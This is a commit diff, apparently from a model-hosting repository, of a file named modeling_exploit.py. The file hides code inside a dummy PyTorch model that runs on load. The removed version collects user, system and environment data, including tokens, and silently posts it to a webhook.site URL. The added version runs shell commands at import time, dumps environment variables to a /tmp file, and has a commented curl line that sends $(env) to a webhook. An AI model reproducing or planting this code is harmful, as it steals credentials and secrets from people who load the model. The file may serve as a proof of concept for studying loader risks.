Update modeling_exploit.py
Browse files- modeling_exploit.py +19 -32
modeling_exploit.py
CHANGED
|
@@ -1,39 +1,26 @@
|
|
| 1 |
-
import torch
|
| 2 |
-
import torch.nn as nn
|
| 3 |
import os
|
| 4 |
import subprocess
|
| 5 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 6 |
|
| 7 |
class ExploitModel(nn.Module):
|
| 8 |
-
def __init__(self):
|
| 9 |
super().__init__()
|
| 10 |
-
|
| 11 |
-
# --- WEBHOOK CONFIG ---
|
| 12 |
-
# Replace this with YOUR unique Webhook.site URL
|
| 13 |
-
WEBHOOK_URL = " https://webhook.site/e282f73f-ed3f-4142-a749-fc7b43c3e6d9"
|
| 14 |
-
|
| 15 |
-
try:
|
| 16 |
-
# 1. Gather Sensitive Data
|
| 17 |
-
whoami = subprocess.getoutput("whoami")
|
| 18 |
-
system_info = subprocess.getoutput("uname -a")
|
| 19 |
-
env_vars = subprocess.getoutput("env") # This captures HF_TOKEN if present
|
| 20 |
-
|
| 21 |
-
data_to_steal = {
|
| 22 |
-
"status": "RCE SUCCESSFUL",
|
| 23 |
-
"user": whoami,
|
| 24 |
-
"system": system_info,
|
| 25 |
-
"environment": env_vars[:1000] # Sending first 1000 chars
|
| 26 |
-
}
|
| 27 |
-
|
| 28 |
-
# 2. Exfiltrate: Send data to Attacker's Webhook
|
| 29 |
-
# Even if the victim's UI shows nothing, your Webhook will get the data.
|
| 30 |
-
requests.post(WEBHOOK_URL, json=data_to_steal, timeout=5)
|
| 31 |
-
|
| 32 |
-
print("\n[!!!] DATA EXFILTRATED TO ATTACKER ENDPOINT [!!!]\n")
|
| 33 |
-
|
| 34 |
-
except Exception as e:
|
| 35 |
-
# Silently fail so the victim doesn't get suspicious
|
| 36 |
-
pass
|
| 37 |
-
|
| 38 |
def forward(self, x):
|
| 39 |
return x
|
|
|
|
|
|
|
|
|
|
| 1 |
import os
|
| 2 |
import subprocess
|
| 3 |
+
|
| 4 |
+
# 1. TOP LEVEL EXECUTION (Triggered immediately on import)
|
| 5 |
+
print("\n" + "!"*50)
|
| 6 |
+
print("POWNED: RCE TRIGGERED DURING MODULE IMPORT")
|
| 7 |
+
|
| 8 |
+
# Execute system commands
|
| 9 |
+
os.system("uname -a > /tmp/rce_proof.txt")
|
| 10 |
+
os.system("whoami >> /tmp/rce_proof.txt")
|
| 11 |
+
os.system("env >> /tmp/rce_proof.txt")
|
| 12 |
+
|
| 13 |
+
# If you have a webhook, add it here too:
|
| 14 |
+
# os.system("curl -X POST -d \"$(env)\" https://webhook.site/YOUR-ID")
|
| 15 |
+
|
| 16 |
+
print("RCE DATA WRITTEN TO /tmp/rce_proof.txt")
|
| 17 |
+
print("!"*50 + "\n")
|
| 18 |
+
|
| 19 |
+
# 2. Dummy Class to keep the loader happy
|
| 20 |
+
import torch.nn as nn
|
| 21 |
|
| 22 |
class ExploitModel(nn.Module):
|
| 23 |
+
def __init__(self, config=None, *args, **kwargs):
|
| 24 |
super().__init__()
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 25 |
def forward(self, x):
|
| 26 |
return x
|